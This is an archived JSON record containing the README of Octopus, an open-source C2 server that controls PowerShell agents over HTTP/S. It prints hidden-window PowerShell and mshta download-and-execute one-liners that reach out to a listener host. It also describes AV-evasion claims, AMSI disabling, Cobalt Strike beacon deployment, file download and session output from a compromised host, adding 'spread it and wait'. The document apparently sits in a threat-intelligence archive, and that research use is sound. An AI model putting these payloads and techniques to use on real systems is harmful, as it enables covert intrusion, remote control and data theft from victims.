{
	"id": "93611881-ce23-4b6f-a491-72118dec8e13",
	"created_at": "2026-04-06T00:21:10.378936Z",
	"updated_at": "2026-04-10T03:20:30.441617Z",
	"deleted_at": null,
	"sha1_hash": "880aee11a3771a300889c92a6517ef12e34db356",
	"title": "GitHub - mhaskar/Octopus: Open source pre-operation C2 server based on python and powershell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 135981,
	"plain_text": "GitHub - mhaskar/Octopus: Open source pre-operation C2 server\r\nbased on python and powershell\r\nBy mhaskar\r\nArchived: 2026-04-05 13:19:40 UTC\r\nWhat is Octopus ? ppyytthhoonn 3\r\nOctopus is an open source, pre-operation C2 server based on python which can control an Octopus powershell\r\nagent through HTTP/S.\r\nThe main purpose of creating Octopus is for use before any red team operation, where rather than starting the\r\nengagement with your full operational arsenal and infrastructure, you can use Octopus first to attack the target and\r\ngather information before you start your actual red team operation.\r\nOctopus works in a very simple way to execute commands and exchange information with the C2 over a well\r\nencrypted channel, which makes it inconspicuous and undetectable from almost every AV, endpoint protection,\r\nand network monitoring solution.\r\nOne cool feature in Octopus is called ESA, which stands for \"Endpoint Situational Awareness\", which will gather\r\nsome important information about the target that will help you to gain better understanding of the target network\r\nendpoints that you will face during your operation, thus giving you a shot to customize your real operation based\r\non this information.\r\nOctopus is designed to be stealthy and covert while communicating with the C2, as it uses AES-256 by default for\r\nits encrypted channel between the powershell agent and the C2 server. You can also opt for using SSL/TLS by\r\nproviding a valid certficate for your domain and configuring the Octopus C2 server to use it.\r\nOctopus key features\r\nOctopus is packed with a number of features that allows you to gain an insight into your upcoming engagement\r\nbefore you actually need to deploy your full aresenal or tools and techniques, such as:\r\nControl agents throught HTTP/S.\r\nExecute system commands.\r\nDownload / Upload files.\r\nLoad external powershell modules.\r\nUse encrypted channels (AES-256) between C2 and agents.\r\nUse inconspicuous techniques to execute commands and transfer results.\r\nCreate custom and multiple listeners for each target.\r\nGenerate different types of payloads.\r\nSupport all windows versions with powershell 2.0 and higher.\r\nhttps://github.com/mhaskar/Octopus\r\nPage 1 of 13\n\nRun Octopus windows executable agent without touching powershell.exe process.\r\nGather information automatically from the endpoint (endpoint situational awareness) feature.\r\nRequirements\r\nYou can install all of Octopus' requirements via :\r\npip install -r requirements.txt\r\nYou need to install nasm for linux and 'mingw-w64' compiler to use the shellcoding feature and the spoofed args\r\nagent.\r\nYou can install nasm on Debian based distros using:\r\napt install nasm\r\nAnd you can install mingw-w64 on Debian based distros using:\r\napt install mingw-w64\r\nOctopus has been tested on the following operating systems:\r\nUbuntu (18.04)\r\nUbuntu (16.04)\r\nKali Linux (2019.2)\r\nYou will also need to install mono to make sure that you can compile the C# source without issues.\r\nOctopus depends on mono-csc binary to compile the C# source and you can install it by the following command\r\napt install mono-devel which has been tested on kali and ubuntu 16.04.\r\nyou can use Octopus without installing mono but you will not be able to use generate_exe command.\r\nAlso please note that compling C# depends on the System.Management.Automation.dll assembly with SHA1\r\nhash a43ed886b68c6ee913da85df9ad2064f1d81c470.\r\nIf you encounter any issues using Octopus, feel free to file a bug report!\r\nInstallation\r\nFirst of all make sure to download the latest version of Octopus using the following command :\r\ngit clone https://github.com/mhaskar/Octopus/\r\nThen you need to install the requirements using the following command :\r\npip install -r requirements.txt\r\nAfter that you can start the octopus server by running the following :\r\nhttps://github.com/mhaskar/Octopus\r\nPage 2 of 13\n\n./octopus.py\r\nYou will by greeted with the following once you run it :\r\n┌─[askar@hackbook]─[/opt/redteaming/Octopus]\r\n└──╼ $python3 octopus.py\r\n ___ ___ ___ ___ ___ ___\r\n / /\\ / /\\ ___ / /\\ / /\\ /__/\\ / /\\\r\n / /::\\ / /:/ / /\\ / /::\\ / /::\\ \\ \\:\\ / /:/_\r\n / /:/\\:\\ / /:/ / /:/ / /:/\\:\\ / /:/\\:\\ \\ \\:\\ / /:/ /\\\r\n / /:/ \\:\\ / /:/ ___ / /:/ / /:/ \\:\\ / /:/~/:/ ___ \\ \\:\\ / /:/ /::\\\r\n /__/:/ \\__\\:\\ /__/:/ / /\\ / /::\\ /__/:/ \\__\\:\\ /__/:/ /:/ /__/\\ \\__\\:\\ /__/:/ /:/\\:\\\r\n \\ \\:\\ / /:/ \\ \\:\\ / /:/ /__/:/\\:\\ \\ \\:\\ / /:/ \\ \\:\\/:/ \\ \\:\\ / /:/ \\ \\:\\/:/~/:/\r\n \\ \\:\\ /:/ \\ \\:\\ /:/ \\__\\/ \\:\\ \\ \\:\\ /:/ \\ \\::/ \\ \\:\\ /:/ \\ \\::/ /:/\r\n \\ \\:\\/:/ \\ \\:\\/:/ \\ \\:\\ \\ \\:\\/:/ \\ \\:\\ \\ \\:\\/:/ \\__\\/ /:/\r\n \\ \\::/ \\ \\::/ \\__\\/ \\ \\::/ \\ \\:\\ \\ \\::/ /__/:/\r\n \\__\\/ \\__\\/ \\__\\/ \\__\\/ \\__\\/ \\__\\/\r\n v1.2 stable !\r\n Octopus C2 | Control your shells\r\nOctopus \u003e\u003e\r\nUsage\r\nUsing Octopus is quite simple to use, as you just need to start a listener and generate your agent based on that\r\nlistener's information.\r\nYou can generate as many listeners as you need, and then you can start interacting with your agents that connect to\r\nthem.\r\nProfile setup\r\nBefore you can start using Octopus you have to setup a URL handling profile which will control the C2 behavior\r\nand functions, as Octopus is an HTTP based C2 thus it depends on URLs to handle the connections and to\r\nguarantee that the URLs will not serve as a signatures or IoC in the network you are currently attacking, the URLs\r\ncan be easily customized and renamed as needed.\r\nhttps://github.com/mhaskar/Octopus\r\nPage 3 of 13\n\nProfile setup currently only support URL handling, auto kill value and headers.\r\nSetting up your profile\r\nTo start setting up your profile you need to edit the profile.py file , which contains a number of key variables,\r\nwhich are:\r\nfile_reciever_url: handles file downloading.\r\nreport_url: handle ESA reports.\r\ncommand_send_url: handles the commands that will be sent to the target.\r\ncommand_receiver_url: handles commands will be executed on the target.\r\nfirst_ping_url: handles the first connection from the target.\r\nserver_response_header: this header will show in every response.\r\nauto_kill: variable to control when the agent will be killed after N failed connections with the C2\r\nExample:\r\n#!/usr/bin/python3\r\n# this is the web listener profile for Octopus C2\r\n# you can customize your profile to handle a specific URLs to communicate with the agent\r\n# TODO : add the ability to customize the request headers\r\n# handling the file downloading\r\n# Ex : /anything\r\n# Ex : /anything.php\r\nfile_receiver_url = \"/messages\"\r\n# handling the report generation\r\n# Ex : /anything\r\n# Ex : /anything.php\r\nreport_url = \"/calls\"\r\n# command sending to agent (store the command will be executed on a host)\r\n# leave \u003chostname\u003e as it with the same format\r\n# Ex : /profile/\u003chostname\u003e\r\n# Ex : /messages/\u003chostname\u003e\r\n# Ex : /bills/\u003chostname\u003e\r\ncommand_send_url = \"/view/\u003chostname\u003e\"\r\n# handling the executed command\r\n# Ex : /anything\r\n# Ex : /anything.php\r\ncommand_receiver_url = \"/bills\"\r\nhttps://github.com/mhaskar/Octopus\r\nPage 4 of 13\n\n# handling the first connection from the agent\r\n# Ex : /anything\r\n# Ex : /anything.php\r\nfirst_ping_url = \"/login\"\r\n# will return in every response as Server header\r\nserver_response_header = \"nginx\"\r\n# will return white page that includes HTA script\r\nmshta_url = \"/hta\"\r\n# auto kill value after n tries\r\nauto_kill = 10\r\nThe agent and the listeners will be configured to use this profile to communicate with each other. Next we need to\r\nknow how to create a listener.\r\nListeners\r\nOctopus has two main listeners,\"http listener\" and \"https listener\" , and the options of the two listeners are mostly\r\nidentical.\r\nHTTP listener :\r\nlisten_http command takes the following arguments to start:\r\nBindIP Defines the IP address that will be used by the listener.\r\nBindPort Defines the port you want to listen on.\r\nHostname Will be used to request the payload from.\r\nInterval How number of seconds the agent will wait before checking for commands.\r\nURL The name of the page hosting the payload.\r\nListener_name Listener name to use.\r\nyou can also view an example of it by running the listen_http command:\r\nOctopus \u003e\u003elisten_http\r\n[-] Please check listener arguments !\r\nSyntax : listen_http BindIP BindPort hostname interval URL listener_name\r\nExample (with domain) : listen_http 0.0.0.0 8080 myc2.live 5 comments.php op1_listener\r\nExample (without domain) : listen_http 0.0.0.0 8080 172.0.1.3 5 profile.php op1_listener\r\n##########\r\nhttps://github.com/mhaskar/Octopus\r\nPage 5 of 13\n\nOptions info :\r\nBindIP IP address that will be used by the listener\r\nBindPort port you want to listen on\r\nHostname will be used to request the payload from\r\nInterval how may seconds that agent will wait before check for commands\r\nURL page name will hold the payload\r\nListener_name listener name to use\r\nOctopus \u003e\u003e\r\nAnd we can start a listener using the following command :\r\nlisten_http 0.0.0.0 8080 192.168.178.1 5 page.php operation1\r\nThe following result will be returned:\r\nOctopus \u003e\u003elisten_http 0.0.0.0 8080 192.168.178.1 5 page.php operation1\r\nOctopus \u003e\u003e * Serving Flask app \"core.weblistener\" (lazy loading)\r\n * Environment: production\r\n WARNING: Do not use the development server in a production environment.\r\n Use a production WSGI server instead.\r\n * Debug mode: off\r\nOctopus \u003e\u003e\r\na listener has been started successfully, and we can view all the listeners using the listeners command:\r\nOctopus \u003e\u003elisteners\r\nName IP Port Host Interval Path SSL\r\n---------- ------- ------ ------------- ---------- -------- -----\r\noperation1 0.0.0.0 8080 192.168.178.1 5 page.php False\r\nOctopus \u003e\u003e\r\nHTTPS listener :\r\nTo create an HTTPS listener you can use listen_https command as such:\r\nOctopus \u003e\u003elisten_https\r\n[-] Please check listener arguments !\r\nSyntax : listen_https BindIP BindPort hostname interval URL listener_name certficate_path key_path\r\nExample (with domain) : listen_https 0.0.0.0 443 myc2.live 5 login.php op1_listener certs/cert.pem certs/key.pem\r\nhttps://github.com/mhaskar/Octopus\r\nPage 6 of 13\n\nOctopus \u003e\u003elisten_https 0.0.0.0 443 myc2.live 5 login.php darkside_operation certs/cert.pem certs/key.pem\r\nSSL listener started !\r\n[+]darkside_operation Listener has been created\r\nOctopus \u003e\u003e * Serving Flask app \"core.weblistener\" (lazy loading)\r\n * Environment: production\r\n WARNING: Do not use the development server in a production environment.\r\n Use a production WSGI server instead.\r\n * Debug mode: off\r\nOctopus \u003e\u003e\r\nThe listen_https command takes the following arguments to start:\r\nBindIP : which is the IP address that will be used by the listener\r\nBindPort : which is the port you want to listen on\r\nHostname : will be used to request the payload from\r\nInterval : how may seconds that agent will wait before check for commands\r\nURL page : name will hold the payload\r\nListener_name : listener name to use\r\ncertficate_path : path for valid ssl certficate (called fullchain.pem for letsencrypt certficates)\r\nkey_path : path for valid key for the ssl cerficate (called key.pem for letsencrypt certficates)\r\nPlease note that you need to provide a valid SSL certficate that is associated with the domain used.\r\nGenerate agents\r\nPowershell oneliner\r\nTo generate an agent for the listener operation1 we can use the following command:\r\ngenerate_powershell operation1\r\nand we will get the following result:\r\nOctopus \u003e\u003egenerate_powershell operation1\r\n#====================\r\n1) powershell -w hidden \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');\"\r\n2) powershell -w hidden \"Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/\r\n3) powershell -w hidden \"$w = (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');In\r\nNote - For Windows 7 clients you may need to prefix the payload with \"Add-Type -AssemblyName System.Core;\"\r\n e.g. powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadStri\r\nHack your way in ;)\r\n#====================\r\nhttps://github.com/mhaskar/Octopus\r\nPage 7 of 13\n\nOctopus \u003e\u003e\r\nNow we can use this oneliner to start our agent.\r\nHTA oneliner\r\nTo generate a HTA oneliner for the listener1 operation1 we can use the following command:\r\ngenerate_hta operation1\r\nand we will get the following results:\r\nOctopus \u003e\u003egenerate_hta operation1\r\n#====================\r\nmshta http://192.168.178.1:8080/hta\r\nspread it and wait ;)\r\n#====================\r\nOctopus \u003e\u003e\r\nPlease note that you can edit the /hta URL using profile.py\r\nOctopus EXE agent\r\nTo generate an EXE agent for listener operation1 we can use the following command:\r\ngenerate_unmanaged_exe operation1 /opt/Octopus/file.exe\r\nand we will get the following result:\r\nOctopus \u003e\u003egenerate_unmanaged_exe darkside_operation2 /opt/Octopus/file.exe\r\n[+] file compiled successfully !\r\n[+] binary file saved to /opt/Octopus/file.exe\r\nOctopus \u003e\u003e\r\nPlease note that you have to install mono-csc to compile the C# source.\r\nOctopus Spoofed arguments agent\r\nYou can generate a new EXE agent that will run a Powershell process with spoofed arguments based on Adam\r\nChester's brilliant research.\r\nTo generate this exe, you can use the following command:\r\nOctopus \u003e\u003egenerate_spoofed_args_exe\r\n[-] Please select a listener and check your options !\r\nSyntax : generate_spoofed_args_exe listener_name output_path\r\nhttps://github.com/mhaskar/Octopus\r\nPage 8 of 13\n\nExample : generate_spoofed_args_exe listener1 /opt/Octopus/file.exe\r\nOctopus \u003e\u003e\r\nGenerate x64 shellcode and x86 shellcode\r\nOctopus can generate both x64 and x86 shellcode starting from version 1.2, the generated shellcode is using\r\nCreateProcessA to start powershell.exe oneliner that will launch powershell agent.\r\nTo generate x64 shellcode, you can use the following command:\r\nOctopus \u003e\u003egenerate_x64_shellcode\r\n[-] Please select a listener and check your options !\r\nSyntax : generate_x64_shellcode listener_name\r\nExample : generate_x64_shellcode listener1\r\nOctopus \u003e\u003e\r\nTo generate x86 shellcode, you can use the following command:\r\nOctopus \u003e\u003egenerate_x86_shellcode\r\n[-] Please select a listener and check your options !\r\nSyntax : generate_x86_shellcode listener_name\r\nExample : generate_x86_shellcode listener1\r\nOctopus \u003e\u003e\r\nInteracting with agents\r\nFirst of all you can list all connected agents using the list command to get the following results:\r\nOctopus \u003e\u003elist\r\n Session IP Hostname PID Username Domain Last ping OS\r\n--------- ------------ ----------- ----- ------------- ------------ ------------------------ ------------\r\n 1 192.168.1.43 HR-PC-TYRMJ 10056 hr-pc\\labuser darkside.com Tue Sep 3 10:22:07 2019 Microsoft Wi\r\nOctopus \u003e\u003e\r\nAnd then we can use the interact command to interact with the host as follows:\r\nOctopus \u003e\u003elist\r\n Session IP Hostname PID Username Domain Last ping OS\r\nhttps://github.com/mhaskar/Octopus\r\nPage 9 of 13\n\n--------- ------------ ----------- ----- ------------- ------------ ------------------------ ------------\r\n 1 192.168.1.43 HR-PC-TYRMJ 10056 hr-pc\\labuser darkside.com Tue Sep 3 10:22:07 2019 Microsoft Wi\r\nOctopus \u003e\u003einteract 1\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nYou can list all the available commands using the help command like the following:\r\nOctopus \u003e\u003elist\r\n Session IP Hostname PID Username Domain Last ping OS\r\n--------- ------------ ----------- ----- ------------- ------------ ------------------------ ------------\r\n 1 192.168.1.43 HR-PC-TYRMJ 10056 hr-pc\\labuser darkside.com Tue Sep 3 10:22:07 2019 Microsoft Wi\r\nOctopus \u003e\u003einteract 1\r\n(HR-PC-TYRMJ) \u003e\u003e help\r\nAvailable commands to use :\r\nHint : if you want to execute system command just type it and wait for the results\r\n+++++++++\r\nhelp show this help menu\r\nexit/back exit current session and back to the main screen\r\nclear clear the screen output\r\ndownload download file from the target machine\r\ndeploy_cobalt_beacon deploy cobalt strike powershell beacon in the current process\r\nload load powershell module to the target machine\r\ndisable_amsi disable AMSI on the target machine\r\nreport get situation report from the target\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nTo execute a system command directly we can type the command directly and then wait for the results based on\r\nthe interval check time that we set when we created the listener.\r\n(HR-PC-TYRMJ) \u003e\u003e ipconfig\r\n[+] Command sent , waiting for results\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nCommand execution result is :\r\nhttps://github.com/mhaskar/Octopus\r\nPage 10 of 13\n\nWindows IP Configuration\r\nEthernet adapter Ethernet1:\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . :\r\nEthernet adapter Ethernet0:\r\n Connection-specific DNS Suffix . : home\r\n Link-local IPv6 Address . . . . . : fe80::f85f:d52b:1d8d:cbae%10\r\n IPv4 Address. . . . . . . . . . . : 192.168.1.43\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.1.1\r\nEthernet adapter Ethernet:\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . :\r\nEthernet adapter Bluetooth Network Connection:\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . :\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nIn this case the command has been encrypted and then sent to the agent, after that the client will decrypt the\r\ncommand and execute it, the agent will encrypt the results, and finally send it back again to the C2 to decrypt it\r\nand show the results.\r\nWe can also use the report command to get the ESA information like the following:\r\n(HR-PC-TYRMJ) \u003e\u003e report\r\n[+] Command sent , waiting for results\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nEndpoint situation awareness report for HR-PC-QNGAV\r\n=============\r\nHostname : HR-PC-QNGAV\r\nDomain : darkside.com\r\nOS : Microsoft Windows 10 Pro(64-bit)\r\nOS build : 10.0.17134\r\nhttps://github.com/mhaskar/Octopus\r\nPage 11 of 13\n\nOS arch : 64-bit\r\nAntiVirus : Symantec\r\nSIEM solution : False\r\nInternal interfaces/IPs :\r\nIP : 192.168.178.144\r\nIP : 172.12.1.20\r\nDevice language : en-US\r\nDevice uptime : 41.6386169797778 hours\r\nDevice local time : 21:55(09/09/2019)\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nYou can load an external powershell module by placing it in the modules directory, then executing load\r\nmodule.ps1 .\r\nAlso you can list all of the modules in the modules directory by executing the modules command like so:\r\n(HR-PC-TYRMJ) \u003e\u003e modules\r\nPowerView.ps1\r\n(HR-PC-TYRMJ) \u003e\u003e load PowerView.ps1\r\n[+] Module should be loaded !\r\n(HR-PC-TYRMJ) \u003e\u003e\r\nMore about Octopus\r\nOctopus v1.0 stable: Cobalt Strike deployment \u0026 much more!\r\nUnveiling Octopus: The pre-operation C2 for Red Teamers\r\nCredits\r\nIan Lyte for reporting multiple bugs in Octopus and pushing an enhanced AMSI bypass module.\r\nKhlief for adding HTA module and fix a bug in download feature\r\nMoath Maharmah for enhancing the encryption module and writing a standalone C# Octopus agent which\r\nwill be added to the upcoming release.\r\nTeslaPulse for testing Octopus\r\nJ005 for adding enhanced Powershell oneliner and fix an issue in the HID attack script.\r\nLicense\r\nhttps://github.com/mhaskar/Octopus\r\nPage 12 of 13\n\nThis project is licensed under the GPL-3.0 License - see the LICENSE file for details\r\nSource: https://github.com/mhaskar/Octopus\r\nhttps://github.com/mhaskar/Octopus\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/mhaskar/Octopus"
	],
	"report_names": [
		"Octopus"
	],
	"threat_actors": [],
	"ts_created_at": 1775434870,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/880aee11a3771a300889c92a6517ef12e34db356.pdf",
		"text": "https://archive.orkl.eu/880aee11a3771a300889c92a6517ef12e34db356.txt",
		"img": "https://archive.orkl.eu/880aee11a3771a300889c92a6517ef12e34db356.jpg"
	}
}